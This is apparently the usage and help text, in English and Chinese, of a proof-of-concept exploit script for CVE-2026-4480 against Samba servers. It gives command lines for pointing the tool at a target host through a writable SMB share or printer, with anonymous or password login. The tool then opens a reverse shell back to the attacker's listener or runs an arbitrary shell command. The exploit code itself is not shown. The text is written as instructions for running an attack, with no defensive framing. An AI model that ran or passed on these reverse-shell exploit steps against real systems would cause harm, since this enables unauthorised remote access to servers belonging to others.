
This is an exploit poc for CVE-2026-4480
用法:python3 exploit.py --lhost <监听主机> --lport <监听端口> -t <目标> -N (适用于匿名登录)
python3 exploit.py --lhost <监听主机> --lport <监听端口> -t <目标> -u <用户名> -p <密码>
[!] 错误:缺少必需参数:-s/--sharename
[*] 注意:如果用户为匿名且无密码,则只需添加 -N,无需 -u 或 -p
##### 用法:
exploit.py [-h] -t 目标 -Lh 监听主机 -Lp 监听端口 -s 共享名 [-c 命令] (-N | -u 用户名) [-p 密码]
选项:
-h, --help 显示此帮助信息并退出
-t, --target 目标 目标 Samba 主机/IP(远程主机)
-Lh, --lhost 监听主机 你的监听 IP(例如 tun0)
-Lp, --lport 监听端口 你的监听端口
-s, --sharename 共享名 (可写入的 SMB 共享/打印机名称)
-c, --cmd 命令 运行特定 shell 命令,而不是反弹 shell
-N, --no-pass 匿名/访客登录
-u, --username 用户名 (用于身份验证的用户名)
-p, --password 密码 (用于身份验证的密码)```